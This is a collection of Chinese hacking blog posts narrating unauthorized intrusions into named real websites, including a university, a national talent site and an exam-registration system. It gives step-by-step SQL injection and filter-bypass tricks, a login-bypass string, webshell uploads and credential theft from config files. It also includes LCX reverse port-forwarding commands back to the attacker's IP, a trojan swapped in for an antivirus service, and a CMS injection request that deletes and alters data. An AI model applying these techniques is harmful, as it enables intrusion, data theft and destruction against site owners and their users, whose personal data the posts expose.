SpookZanG

给某网站做检查，刚开始以为是Sniffer，但是最后用jsky扫了一下，发现有注入点。

扫了一下注入点，一个软件说一种权限，有说SA的，有说pb的，等等….

既然一个软件说一种，我就让说SA的软件去直接执行CMD，说Db的软件让他去列目录，说PB的软件让他去跑表。

（当时的想法就是，是SA就直接执行命令。PB的话就当ACCESS来搞，最后拿到了MD5，没破出来也没用上。）

结果说SA的认识到了自己的错误，CMD无法执行。DB的列出来目录。

刚开始在D盘找到了一个目录，本以为这个目录就是他的网站目录了，但是这个目录只是个备份。

找到真目录，备份一句话。

一句话变小马，小马变大马，大马变成了服务器。

之后打算用它嗅探一下别的主机，全部设置好，还特意检查了一下丢包率，丢包率是0%，说明没啥问题。（如果丢包率大于10%就应该停止，说明你设置的有错误）

但是问题来了，嗅探2分钟不到，服务器当机…? 难道是我设置错误？？

不过管理员2个小时之后就解决了。

之前搞下来一个同网段的服务器，本想用它来嗅探这个机器，但是那个机器一运行CAIN就重启，莫非防火墙？

修补的话….权限做死，不让上传目录执行脚本，后台藏好一点，注入点补上，S-U的默认密码改一下，就差不多了吧…..

SpookZanG[S.c.t]

毫无技术可言，直接发图图把～

点击查看图片

作者：SpookZanG[S.C.T]

注：大型护肤品不是指 大型皮肤的保护产品 而是指这个护肤品的规模较大
注2：本文没有任何技术含量，大牛绕道。

晚上，无聊，玩魔兽世界被会长放鸽子，很是烦，于是想找个网站出出气。当时本来想搞个卫生巾的网站，然后把33的名字扔上去，后来却来到了这

个传说中的护肤品网站。

一看还是asp的，来吧注入。 于是在后面加上’，却返回了防注入程序！

点击查看图片

恩，一看就知道这个是个不错的防注入程序，我们把id换成%69%64，成功注入！

把它扔到穿山甲里，竟然判断是ACCESS数据库？莫非我进入了传说中的山寨网站？后来一看，发现了其中缘由。他整个网站都是FLASH做的，没法判

断关键字，所以软件不管用了！ 既然这里有注入点，那么根据墨菲斯托原则，在那里的某一个地方，也一定有注入点！墨菲斯托就是墨菲斯托，我

果然又发现一个注入点。

把它扔进穿山甲，果然是MSSQL的数据库，还是显错模式，这个站长真是关心人啊，要在是SA权限就更关心人了。但是最后却是db权限，db权限可以

通过备份拿到shell，但是我失败了，貌似是一句话被杀毒软件给KILL了，我们还可以这样搞——先列目录，然后找到后台，在找到密码，就成了（

传说中的MSSQL按ACCESS的搞法去搞，超级笨方法）。但是弄了将近一个小时，破网站的后台我竟然没找到。不过，这个服务器上不止他一个网站，

我搞一个好搞的，我查了一下这个网站的IP发现查不出有其他网站。但是他网站所在目录文件夹命名都是有规律的，一般按网站的域名来命名。于是

打开Google(支持google,反对baidu！！)一搜，还真搜到了

因为目录都有了，直接来到后台，尝试弱密码，成功进入。（当时想，如果弱密码进不去，就在这里找个注入点拿到密码进入）

点击查看图片

发现他有个上传附件的地方，根据墨菲斯托原则，这里弱智，那里也肯定弱智。我就直接上传ASA试试吧，果然成功了，但是不知道上传到了哪里，

我们还是得通过列目录来找。果然找到了！

然后登录shell

点击查看图片

然后再次根据墨菲斯托原则，这里弱密码，那里肯定也弱密码。尝试s-u提权，成功！

3389登录截图

最后说两句，本文中数次提到墨菲斯托和墨菲斯托原则，其实这个人我根本不认识，名字是瞎编的，他的原则自然也是瞎编的。

文章太菜，牛人请绕道。

作者：SpookZanG[S.c.T]

前几天，某个叫情深的MM给我发消息，让我帮他弄个站。漂亮MM发话而且他又答应跟我去开房，这必然得弄下来啊～。

于是拿到某个PHP的网站。

点击查看图片

我是一个“很勤奋”的人，所以我的格言是：能工具的就绝不手工。手工太累。所以把它扔到可爱的穿山甲里面，发现穿山甲竟然检测其为MSSQL，跟实际不相符啊～。（也有PHP与MSSQL搭配的，以前见过，不过今天不是。）这命名就是MYSQL数据库啊。

（顺便说下怎么判断是MYSQL还是MSSQL，比如他的连接是http://www.spookzang.net/index.php?id=1，你在他后面加上/*SpookZanG或者–SpookZanG，看哪个能正常显示，前者正常显示就为MYSQL  后者正常显示就为MSSQL）

这时，情MM发来信息说找到了表，但是找不到列。而且能读出文件来。

点击查看图片

既然能读文件，我们就来读取一下可能包含数据库帐号密码的文件。一般登录文件都会调用包含数据库帐号密码的文件。
我先读了login_act.php

<!--p
session_start();
 
Header("Content-type: text/html; charset=GB2312");
 
require "title.php";
 
$mod = $_REQUEST['mod'];
 
$mod=empty($mod)?'out':$mod;
 
  switch($mod){
 
  case 'out':
 
    $RegUse-->Logout();
 
  break;
 
  case 'in':
 
    $env=" and publish='1'";
 
    $RegUser-&gt;setUserEnv($env);
 
    $RegUser-&gt;Login($_POST['usr'],$_POST['pwd']);
 
  break;
 
}
?&gt;

发现里面包含了title.php。并发现$RegUser含有uer和pwd。我们在来读title.php

<!--define('__SYSTEM_ROOT', '../');
 
include __SYSTEM_ROOT.'framework_gb/framework.php';
using('System.Web.UI.Handle');
using('System.Web.UI.Handle_new');
using('System.Web.UI.Toolbar');
using('System.Data.Data');
using('System.Data.Plugins.Option');
using('System.Smarty.Smarty');
using('System.Functions.Functions');
 
require_once __SYSTEM_ROOT."global.php";
using('System.User.User');
 
$RegUser=new User($_globa-->table-&gt;user,'content_name','content_pass');
 
$Sarray=array('userid'=&gt;'auto_id',
            'user_name'=&gt;'content_name',
            'role_id'=&gt;'role_id',
            );
 
$RegUser-&gt;setSessArray($Sarray);
 
?&gt;

这时，我们就知道了他的列名了，分别为’content_name’和’content_pass’。而且他里面还有global.php这个文件。

我来读一下这个文件global.php

<!--p
 
@session_start();
/*
* Created on 2005-11-27
*
* To change the template for this generated file go to
* Window - Preferences - PHPeclipse - PHP - Code Templates
*/
define('_ACCESS_VALID', 1);
 
/**
* 打开所有错误选项
*/
 
/*
ini_set('display_errors', 1);
error_reporting(E_ALL ^E_NOTICE);
*/
/**
* 系统绝对路径
*/
if (!defined('SYSTEM_ROOT'))
define('SYSTEM_ROOT', dirname(__FILE__));
 
if (!defined('TMP_ROOT'))
define('TMP_ROOT', SYSTEM_ROOT.DIRECTORY_SEPARATOR.'tmp'.DIRECTORY_SEPARATOR);
 
/**
* 系统相对路径
*/
if (!defined('__SYSTEM_ROOT'))
define('__SYSTEM_ROOT', '');
 
if(!defined('SYSTEM_UPLOADS_DIR'))
define('SYSTEM_UPLOADS_DIR',SYSTEM_ROOT.'/file/upload/');
define('_SYSTEM_UPLOADS_DIR',__SYSTEM_ROOT.'/file/upload/');
 
define('_NOIMG',SYSTEM_ROOT.'/images/nophoto.gif');
define('CODE_DIR',SYSTEM_ROOT.'/code/');
 
/**
* 定义时间常量
* @final LONG_DATE
* @final SHORT_DATE
* @final SERVER_TIME
*/
define('LONG_DATE', date('Y-m-d H:i:s'));
define('SHORT_DATE', date('Y-m-d'));
define('SERVER_TIME', date('H:i:s'));
 
/**
* 常用服务器配置常?Y
* @final ENV_MAGIC_QUOTES_GPC
* @final ENV_OUTPUT_BUFFERING
* @final ENV_REGISTER_GLOBALS
* @final ENV_SESSION_LIFETIME
* @final ENV_UPLOAD_MAX_FILESIZE
*/
define('ENV_MAGIC_QUOTES_GPC', (int) ini_get('magic_quotes_gpc'));
define('ENV_OUTPUT_BUFFERING', (int) ini_get('output_buffering'));
define('ENV_REGISTER_GLOBALS', (int) ini_get('register_globals'));
define('ENV_SESSION_LIFETIME', (int) ini_get('session.cookie_lifetime'));
define('ENV_UPLOAD_MAX_FILESIZE', (int) ini_get('upload_max_filesize'));
 
/**
* 系统常用路径常量
* @final SYSTEM_UPLOADS_DIR
*/
 
include SYSTEM_ROOT.DIRECTORY_SEPARATOR.'config.php';
include SYSTEM_ROOT.DIRECTORY_SEPARATOR.'vars.php';
 
//模板
$smarty = new Smarty();
$smart-->template_dir = $SmartyCfg['TEMPLATE_DIR'];
$smarty-&gt;compile_dir = $SmartyCfg['COMPILE_DIR'];
$smarty-&gt;config_dir = $SmartyCfg['CONFIGS_DIR'];
$smarty-&gt;cache_dir = $SmartyCfg['CACHE_DIR'];
$smarty-&gt;left_delimiter = $SmartyCfg['LEFT_DELIMITER'];
$smarty-&gt;right_delimiter = $SmartyCfg['RIGHT_DELIMITER'];
$smarty-&gt;caching = false;
$smarty-&gt;compile_check = true;
$smarty-&gt;debugging = false;
 
$_tpl = new StdClass();
 
$_tpl-&gt;site="site/";
$_tpl-&gt;lib=$_tpl-&gt;site."lib/";
 
$_tpl-&gt;header=$_tpl-&gt;site."lib/header.htm";
$_tpl-&gt;footer=$_tpl-&gt;site."lib/footer.htm";
 
define('NEWIMG',$config-&gt;LiveSite.'/images/05062003011.gif');
 
define('NEWDATE',3);
 
//数据
 
$Data = new Data();
$Data-&gt;Open($DBType,$DBCfg);
$Data_Sec = new Data();
$Data_Sec-&gt;Open($DBType,$DBCfg);
 
$_global = new StdClass();
 
$_global-&gt;table = new StdClass();
 
/**
*
* 取得框架相对路径
*/
$_global-&gt;framework_path = new StdClass();
$_global-&gt;framework_path-&gt;System = getPath('System');
$_global-&gt;framework_path-&gt;FCKeditor = getPath('System.Web.UI.FCKeditor');
$_global-&gt;framework_path-&gt;Htmledit = getPath('System.Web.UI.Htmledit');
$_global-&gt;framework_path-&gt;Upload = getPath('System.Upload');
$_global-&gt;framework_path-&gt;Dtree = getPath('System.Web.UI.Dtree');
$smarty-&gt;assign('framework_path',$_global-&gt;framework_path);
 
$_global-&gt;table-&gt;admin_role = 'sys_role';
$_global-&gt;table-&gt;module = 'sys_module';
$_global-&gt;table-&gt;defmodule = 'sys_plugin';
 
$_global-&gt;table-&gt;user = 'sys_user';
$_global-&gt;table-&gt;news_content = 'news';
$_global-&gt;table-&gt;news_class='sys_module';
$_global-&gt;table-&gt;news_info='news';
$_global-&gt;table-&gt;article_content = 'article';
$_global-&gt;table-&gt;share_price = 'share_price';
$_global-&gt;table-&gt;pdf_content = 'pdf';
$_global-&gt;table-&gt;video_content = 'video';
$_global-&gt;table-&gt;person_content = 'person';
$_global-&gt;table-&gt;guest_content = 'guest';
$_global-&gt;table-&gt;vars="vars";
 
$_global-&gt;table-&gt;productmodule = 'productmodule';
$_global-&gt;table-&gt;product = 'product';
$_global-&gt;table-&gt;zhaopin = 'zhaopin';
$_global-&gt;table-&gt;vote = 'vote';
$_global-&gt;table-&gt;friendlink='friendlink';
$_global-&gt;table-&gt;focusimg='focusimg';
$_global-&gt;table-&gt;database_back="database_back";
$_global-&gt;table-&gt;mailadmin='mailadmin';
$_global-&gt;table-&gt;mailshow='sendmail_list';
 
$_global-&gt;table-&gt;guest_touch='guest_touch';
 
$_global-&gt;table-&gt;member='member';
$_global-&gt;table-&gt;cent='cent';
$_global-&gt;table-&gt;video='video';
 
$_global-&gt;form-&gt;dateimg = "../tpl/images/toolbar/html_f2.png";
$_global-&gt;form-&gt;noimg = "../tpl/images/toolbar/html_f2.png";
 
if(ENV_OUTPUT_BUFFERING&gt;0){
  ob_end_clean();
}
?&gt;

其中的include SYSTEM_ROOT.DIRECTORY_SEPARATOR.’config.php’;

他的ROOT密码 没准就在那里。

最后读出了ROOT密码和网页的管理员帐号。

不过，帐号登录不了。（administrator这个权限高的没法登录，权限低的却一点问题没有，真实匪夷所思……）

而且处于内网当中，所以root也是没有办法在外网登录。

本文只是介绍一下入侵这个网站的思路。如有错的地方，欢迎指出讨论。（特别是那个帐号无法登录的问题）

St4nd & SpookZanG[S.C.T]

话说，在这秋高气爽，秋风瑟瑟，秋风送暖，秋阳杲杲的日子里，我感觉应该为建设和谐社会，建立和谐社区，维护世界和平，神9探月旅行，做点贡献，于是来到了中国国家人才网。话说这个网可不简单，是“人事部全国人才流动中心主办”的！这个中心一定非常的NB，因为我没有听说过。

点击查看图片

打开网站，发现网站是JSP的。随便打开一个连接，把它扔到穿山甲里，发现是SA的注入点！我感觉JSP搭配MSSQL的比较少见，我到是经常见到JSP+Oracle的。

点击查看图片

于是乎我非常高兴，在脑子里闪现出了无数的提权方法：执行命令拉，下载文件拉（SA权限能下载一个不大于8k的文件），写入VBS拉。等等等等。

但是呢，事情往往没有我想的那么简单。首先呢，他是内网，没法从外网连接3389，其次，这个SA不是显错模式，搞起来就比较烦人了，后期列目录，列表明啥的都得一个一个的猜，麻烦！费时！可是我是谁呢，我于是打算找个人来一起搞，先叫33，33说他在拍片，忙！又叫Demon和小T，他们都说我没接触过JSP，让我找33（你们不会是商量好的吧？）。最后终于st4nd的出现，解救了我。跟他打招呼完毕后，问他搞站么，他说搞。于是把网站注入点发了过去。

之后，我发现了一个备份网站的路径，找到了另一套程序，http://www.newjobs.com.cn/city_manager/ ，于是我抱着试一试的心态，输入’or’='or’，但是呢，不成功，返回了500错误。我感觉那个后台的确是能绕开的，没有过滤。于是乎，换成了’or”=’，正常进入。

点击查看图片

有在里面发现了ewebeditor，http://www.newjobs.com.cn//tools/ewebeditor/，似乎胜利在向我招手。但是呢，事情网网没有我想的那么简单，通过列那个备份目录发现，他根本没有登录页面，而且他这个ewebeditor全是HTML的，真烦人啊！！(他貌似有个上传的页面，但是我打开是500错误……)

这时，st4nd发来了一个“resin-3.1.5”，这个东西是什么呢？Resin是CAUCHO公司（http://www.caucho.com/）的产品，是一个非常流行的支持servlets 和jsp的引擎，速度非常快。

而在resin-3.1.5下的conf\resin.conf很可能存放着网站的路径，于是找到这个文件，拿出穿山甲，读了出来。

虽然最后没有找到路径，不过找到了SA的密码（为了防止被一些不法分子轻松利用，密码隐藏，想要自己去读。）：

1
2
3
4
5
6
7
8
9
10
11

<database>
           <jndi-name>jdbc/mysql</jndi-name>
           <driver type="com.microsoft.jdbc.sqlserver.SQLServerDriver">
             <url>jdbc:microsoft:sqlserver://localhost:1433</url>
             <user>sa</user>
             <password>XXXXXXX</password>
            </driver>
            <prepared-statement-cache-size>8</prepared-statement-cache-size>
            <max-connections>20</max-connections>
            <max-idle-time>30s</max-idle-time>
          </database>

虽然有了SA的密码，但是因为是内网，无法从外部连接。所以要用剑心写的那个web mssql连接器去搞。但是因为没有路径所以也就放置了。

因为找不到路径，st4nd就说应该用VBS提权，我感觉服务器上如果有杀软的话，VBS提权的成功率很低的。在尝试了一下后，发现服务器上果然有杀软，写上去的VBS被干掉。

到学校的第2天，st4nd发来了消息，说找到路径了，通过备份数据库弄上去了马，不过据说杀软很强大(后来知道，原来是JB金山毒霸2008)。

并给我下了最后通牒，搞下他，渗透服务器！

接到st4nd的命令，我快马加鞭，倍道而进，风驰电掣，大步流星，奔逸绝尘的回了家，打开电脑，连上shell，这个shell是JSP的，33写的，通过33的马，把自己的马弄上去，进入！

点击查看图片

还记得那个SA的密码么？ 通过他连接！
因为内网，打算上传个LCX反弹出来3389，提权。

但是呢，有杀软，弄不上去……33说他有免杀的LCX。33把LCX给我之后，我发现竟然被杀？！

我打算结束掉那个破B金山杀毒，但是失败了。

真是郁闷… …看来最近得恶补一下免杀了……

文章先发上来把，谁有能免杀的LCX或者反弹马说下，好拿下他，渗透之…….

最后说下,躺谢，趴谢，打滚谢st4nd的鼎力支持。

非常不幸，没图了，转移服务器弄掉了，然后DRT因为空间换到国外，论坛里的图片也没了，凑服看把，哪天在拿下一次。

作者：SpookZanG[D.R.T]

话说，秋天到了，天气凉了，在这收获的季节，在这金秋，我们可爱的母校迎来了三十年的校庆，这是一个美丽的季节。我们学校又组织我们去了国家体育馆，虽然我不想去，可是学校利用学分威逼利诱，没有办法，只好去了。但是，这不是我的主观意愿，所以……我要为学校在这三十年校庆之际，献上一份“厚礼”。

先打开主页http://www.buu.edu.cn/，哇，好“漂亮”的网页，先探测探测吧。随便找个连接，点开，http://www.buu.edu.cn/home/gg/news_con.jsp?fid=sph20080902111726756

在后面，分别加上 ‘ ，and 1=1  ， and 1=2。 发现有注入漏洞

看样子貌似是Orcale数据库。本打算猜一下密码和表段啥的，可是看到他简陋的页面可以断定，后台更简陋。很可能只能跨站啥的，连上传都没有。(其实开始猜解数据库了，可是每当猜解到一半，服务器上的数据库就会出错，所以就没有继续搞。)

正所谓条条大路通罗马，（至于这句话什么意思，不明白的也不必深究，因为跟入侵没关系）我们来看看别的页面。

我们打开http://news.buu.com.cn/，在搜索那里随便搜索点东西，我搜索的是3434，本来还以为得抓包，然后构造连接，但是我发现，他是直接显示的，不用构造。

http://news.buu.com.cn/xmllist/search_news.asp?newskey=3434&mtype=0&selectf=0&Submit22=%CB%D1%CB%F7

我们把 3434后面的都删除，发现删除后不能正常显示，没关系，我们还可以这样构造，把“newskey=3434”放到最后面，弄成这样:

http://news.buu.com.cn/xmllist/search_news.asp?mtype=0&selectf=0&Submit22=%CB%D1%CB%F7&newskey=3434

然后，在后门加上单引号’，出现

发现，他有防注入程序，但是呢……，他的防注入是不是会有漏洞呢？我们把newskey换成URL格式%6E%65%77%73%6B%65%79，

然后在尝试提交’ and 1=1 and 1=2，发现有注入漏洞！是DB权限，DB权限，可以通过备份得到一句话。

可是我们不知道他的路径，这怎么办呢？

我一边猜解着表名，一边查找着后台，在尝试到http://news.buu.com.cn/main.asp发现他有一个探针，显示出了路径，看来我拿到权限有望了！

把有注入的连接扔到穿山甲里，然后通过穿山甲备份数据库，但是失败了……看来这条路走不通了。(后来手工检测的时候，发现是PB权限，所以无法备份得到shell，所以说，不能太相信软件！)

正所谓条条大路通罗马，（至于这句话什么意思，不明白的也不必深究，因为跟入侵没关系）这条不成，还有别的呢～在看看别的分站。

最后来到了http://ldxsc.buu.com.cn/，我发现他似乎有EWEBEDITOR。

我在后面输入EDIT，发现出现了403错误，看来联大似乎离死不远了……

我输入http://ldxsc.buu.com.cn/taiyanyuan/edit/admin_login.asp，出现了传说中的页面，我密码尝试admin admin888 admin999。

发现都无法登入，没关系，把数据库down下来，然后破解就OK了，输入默认的数据库，db/ewebeditor.mdb，把数据库down下来，然后拿着破解的密码登录，成功！

然后通过ewebeditor的老方法拿到了webshell。

然后在服务器里进行地毯式搜查，发现他的D,E,F盘都是分站。

最后在E盘里的一个ASPX网站发现了一个有SA的帐号（Maxil发现的，我至今没有找到-_-||）

拿着SA的帐号，通过WEB版的SQL登录器登录（因为是内网，外面连不上）。成功，并且发现组件齐全。

然后执行命令netstat -an看看他都开了啥端口。

发现有3389.因为是内网，所以从外网是连不上的，但是我们可以利用LCX来帮忙。（本来打算上传个反弹的马马的但是无奈于我对于免杀这块的技术空白……所有上传的马全被可爱的卡巴给删除了。在废句话，最后拿下的时候，本想把C盘填入卡巴的可信区域，【填入可信区域，卡巴就不会扫描他拉～】，然后留个后门，弄个反弹木马啥的，但……但……但……他的卡巴竟然设了密码！！真是……唉……）

我把LCX上传上去，先在本地执行 （LCX -LISTEN 接收数据端口 转向端口）LCX -LISTEN X Y，并在WEB版SQL里执行(LCX的格式LCX的地址 -slave 你的IP 你接收的端口 他的IP 他的端口)E:\lcx.exe -slave 219.x.x.90 x 10.11.6.16 3389。

然后我用远程桌面连接127.0.0.1:Y(Y的端口不要用3389).

成功！

最后就是上传一个CAIN进行嗅探，等待着密码的降临……

写在最后：本文没有任何技术，此文是一篇入侵笔记，记录我在入侵时遇到的困难、问题以及我解决的方法。

如果本文哪里写的有错误或者有更好的方法，欢迎指出。

新云CMS Online.asp页面过滤不严导致SQL注入漏洞

————————————-
注：本站首发，转载请保留，谢谢！

http://www.neeao.com

Neeao’s Security Blog
————————————-
漏洞发布：yamato[BCT]

发布日期：
2008-2-15

更新日期：
2008-2-21

受影响系统：
最新版本

漏洞文件：
/inc/online.asp

代码分析如下：

1
2
3
4
5
6
7
8
9

OnlineSQL = "INSERT INTO NC_Online(id,ChannelID,username,identitys,station,ip,browser,startTime,lastTime,userid,strReferer) VALUES (" & UserSessionID & "," & cid & ",'" & strUsername & "','" & stridentitys & "','" & CurrentStation & "','" & remoteaddr & "','" & BrowserType.platform&"|"&BrowserType.Browser&BrowserType.version & "|"&BrowserType.AlexaToolbar&"'," & NowString & "," & NowString & "," & userid & ",'" & strReferer & "')" //第69行
。。。。。。
Agent = Request.ServerVariables("HTTP_USER_AGENT") //第99行
。。。。。。
ElseIf Left(Agent, 5) = "Opera" Then '有此标识为浏览器 //第162行
      Agent = Split(Agent, "/")
      Browser = "Mozilla "
      Tmpstr = Split(Agent(1), " ")
      version = Tmpstr(0)

HTTP_USER_AGENT我们可以控制，则version变量我们就可以控制了。

构造数据包如下：
POST /inc/online.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://localhost/xx.htm
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Opera/haha’,2008,2009,11111,”);delete from NC_Online;update[NC_User]set[buycode]=7;–
Host: localhost
Connection: Keep-Alive
Cookie: ASPSESSIONIDAABBCRRS=FFGNDBDDKJLFADOGOMKLBGPF
成功执行sql语句

注意的地方：
1. 在两次分割成数组的时候是以”/”和” “,所以构造的sql语句时使用的间隔符就不能用/**/和空格，上面是使用tab键弄出来的空格。
2. 一定要加上delete from NC_Online,不然下次程序就不执行insert语句，而改成执行update语句了。

利用工具去邪8的论坛下吧(很BT的工具，不是工具的程度BT，而是在关闭工具时会打开某个网站……)
点击下载

刚刚……有人问我，sa无法执行net命令，我感到比较吃惊，第一反应就是组件被删除了，可是别的命令还能执行。
于是，我感觉应该是管理员做了处理。  其实可以这样（如果真是SA）权限，上传一个pcshare啥的，然后通过sa执行他。这样应该就没问题了。
我在网上找了一篇关于SA的文章，咱们一起学习吧。

原作者：HackEsT
以前经常看到一句话，据说是牛人说的：SA注入拿不到系统权限就是水平问题！前几天遇到的情况足以推翻这句所谓我名言！SA注入点在很多种情况下是相对比较容易拿一点，但是不是说有SA就有系统权限呢，其实不然！SA下不能拿到系统权限的情况也比较多，我就简单的说明一下我前几天遇到的情况，至于其他方面大家提出共同研究就是了，嘿嘿。

    几天前朋友把一个SA注入点发在群里，说他实在是拿不到系统权限。我问他什么环境，他说可以执行部分命令，也有回显，也可以列目录，WEB与DATA服务器并不分离。这种情况起码拿到shell是比较容易的事情，组件没有删除的话。我问了下他拿到webshell没，那小子居然说没拿到……一心只想得到系统权限……一心只想进3389！我原来也认为SA都拿不下服务器的确是水平问题的，所以答应帮他看看这个注入点！NBSI检测，显示权限的确为SA，执行命令有回显。本以为加个用户不就得了，但问题没有想象中的这么简单！执行net user命令显示出了所有用户，但是执行net user hackest hackest /add 的时候提示拒绝访问！net1 user hackest hackest /add同样提示拒绝访问！情况似乎的确比较复杂……开始我以为是net.exe、net1.exe这两个文件的权限做过权限设置，用cacls.exe更改net.exe和net1.exe的文件访问属性也提示拒绝访问！所以打算上传一个本地的net.exe再执行添加用户的操作。但是用VBS文件下载不了，加密了依然下载不了……服务器用的是瑞星！要传文件的话还是先老老实实的拿到webshell再说吧，列目录确定WEB路径，啊D上传了一个海阳eval版一句话ASP马。有个一句话就已经很足够了嘛，嘿嘿。有了webshell就查看存在注入漏洞的文件，找到数据库连接文件，得到MSSQL的有SA权限的用户名和密码，因为目标服务器的MSSQL不允许外连，所以弄了个sqlrootkit.asp上去，用得到的用户名和密码成功连接，并且可以执行部分命令。先来看看net.exe文件的访问属性，据此显示是正常的默认权限，看来权限没有做过更改！在sqlrootkit.asp里执行cacls.exe c:\windows\system32\net.exe 返回的结果如下：
利用xp_cmdshell扩展执行cacls.exe C:\windows\system32\net.exe
C:\windows\system32\net.exe NT AUTHORITY\INTERACTIVE:R
                           NT AUTHORITY\SERVICE:R
                           NT AUTHORITY\BATCH:R
                           BUILTIN\Administrators:F
                           NT AUTHORITY\SYSTEM:F
                           BUILTIN\Administrators:F
  
      可以看出权限很正常的，没有做过什么变态的设置，跳到c:\windows\system32目录下查看net.exe文件的大小也正常，没有替换成别的什么嘛。net1.exe的情况和net.exe情况一样，无论是文件的大小还是文件的访问权限都很正常，但是为什么SA注入点却没有权限加上用户呢！然后我又把net.exe上传到everyone完全控制的目录，再在sqlrootkit.asp里执行添加用户的命令，但是依然提示“拒绝访问”（如果把net.exe删掉，让系统自动恢复net.exe，就会把net.exe 这个文件的属性都还原成默认状态的了，这个可以解决部分net.exe做过权限设置的服务器）！

  搞了两天，毫无进展，忍无可忍，邀请朋友参加讨论。职业色狼、Lenk、花非花、当然还有我，四个人讨论了一晚都没有解决问题，甚至连为什么会这样也没搞清楚！而且还到EST上发帖公开论坛了，嘿嘿（帖子地址：http://forum.eviloctal.com/read-htm-tid-28811.html有兴趣的可以去看下，对理解这个文章比较有帮助）。其实最主要的问题是我根本无法利用这个注入点来执行任意我上传的exe文件！要是能执行mt.exe，克隆一下再用pspasswd.exe更改一下密码就行了。不过以上所说的克隆和改密码都需要足够的权限！但在此文中遇到的这个注入点，我们可以慢慢确定注入点根本就不具有system权限！根据EST朋友的跟帖，我总算明白了为什么SA下依然无法拿到服务器权限了！

  首先执行whoami，返回：
利用xp_cmdshell扩展执行whoami
ctnt-ct17854\sqlsqlsql
意思是问问系统“我是谁”，系统回答到“我是sqlsqlsql呀”得知当前MSSQL运行的用户为sqlsqlsql，一看这样子都不像是有system权限的用户！所以我们来继续确定下sqlsqlsql的身份，执行net user sqlsqlsql返回如下信息：
net user sqlsqlsql
用户名                sqlsqlsql
全名                  sqlsqlsql
注释                  newccc
用户的注释            
国家(地区)代码        000 (系统默认值)
帐户启用              Yes
帐户到期              从不
上次设置密码          2005-9-30 16:18
密码到期              从不
密码可更改            2005-9-30 16:18
需要密码              Yes
用户可以更改密码      No
允许的工作站          All
登录脚本              
用户配置文件          
主目录                
上次登录              2007-5-24 3:03
可允许的登录小时数    All
本地组成员            *Users              
全局组成员            *None                
命令成功完成。

     情况现在似乎比较明朗了，MSSQL是以sqlsqlsql这个用户的身份启动的，而sqlsqlsql这个只是个普通用户，属于Users组的。换句话说就是MSSQL下的SA最高境界也只能是Users组成员的权限，也就是一个普通用户的权限而已。普通用户自然不具有添加系统用户的权限，所以之前遇到的问题基本上都可以 迎刃而解了！其实你在本地以普通用户的身份操作一下就容易理解很多的了，很多东西都不能干的，普通用户权限受限较多，起码有一点，就是它是无法实现添加系统用户的操作，除非溢出提权！

    不知道大家明白了没，现在这种情况似乎比较多，一天内可以遇到三个这类SA一样无法拿下服务器的注入点，所以那句“SA注入拿不到系统权限就是水平问题”是错误的！建议结合EST的帖子再看本文会容易理解一点，嘿嘿 .

作者：SpookZanG

刚刚，MaxiL发来信息，问我s-u6.4有什么提权方法。

点击查看图片

我感觉S-U提权都是一样，都是通过默认密码提权。 而且除了白痴+脑子触过雷的站长以外，其他的人基本不会用默认密码。

我向他要了SHELL，上去看看。总感觉不爽。于是我做了一个伟大的决定！！！！！

上传自己的shell……

这回舒服多了。

我发现他有pcanywhere 着可是个提权的重头戏啊，哇哈哈哈哈哈。

点击查看图片

BUT，还没等我笑完（注意是笑完，不是玩笑！），MaxiL就说了，不能用～～！ 被锁定了。（给我迎头痛击。）

我让他运用社会工程学，尝试一些解锁，结果没成功。郁闷……

点击查看图片

既然没成功，我就找别的方法。正所谓 条条大路通罗马。 至于这句话什么意思，大家不必深究，这句话也根本次入侵也没太大关系。

于是我发现了万恶的瑞星。（叫你跟卡巴做对，弄死你！哇哈哈哈哈哈，卡巴万岁～！）

点击查看图片

瑞星的这个服务默认是启动的，如果我替换服务的话……

先重命名为 CCenter1.exe   然后上传我的马 名字为CCenter.exe    然后服务器重启  就会运行它了。

什么，什么?怎么让服务器重启的。

这有2种方法，NO.1 DDoS。（本来说用这招的可是没用上。下次吧。）
             NO.2 Pcanywhere

Pcanywhere ？  

对，就是Pcanywhere。

“刚刚不是被锁定了吗？”

的确被锁定了，但是他还是能执行重启，关机。

于是乎……上线啦～～

点击查看图片

然后就是添加管理员，然后跟MaxiL共享肉鸡。嘿嘿哈哈哈哈哈……

截张图嘿嘿。

点击查看图片

总结一下，其实，本人是个超级+Super+菜鸟。这次成功纯属运气。
运气一是他的瑞星的文件夹竟然可以随意重命名（顺便说一下，替换服务只能重命名，是删不掉的。）。
运气二是我没做免杀的pcshare竟然没被杀？！（做免杀太麻烦，用CCL特征码的话至少一上午，累～）。
运气三，不用DDoS可以重启。舒坦。

其实入侵就好像作数学题，要思维宽阔，要用不同思路来搞定它，不能一条路走到黑。

最后顺便说一下，替换服务一般只替换第三方服务，不要替换系统的，要不然…………

SpookZanG

高考报名存在爆个人信息漏洞。

因为现在已经关闭报名了，所以我把它写出来。

其实，我感觉他还应该有注入的漏洞，但是，无奈，高考报名那几天正好赶上考试，没有时间多看，只是找出了能随意爆出任意考生信息的漏洞。

我来到高考报名那点，在后面随意添加了一个manage，就出现了可怕的一幕，竟然可以随意查看文件……

http://www.spookzang.net/attachment/1200123792_1952a185.jpg

我这时找到了一个文件并在后面构造了一个准考证号
看出来了……！
http://www.spookzang.net/attachment/1200123792_3027a63f.jpg

http://www.spookzang.net/attachment/1200123792_7533ce42.jpg
北京教育考试院还有别的漏洞，我已经提交了快半个月了，管理员没理我，可能是因为漏洞不大吧……

改天，想办法直接入侵进去，让他看看无视我的后果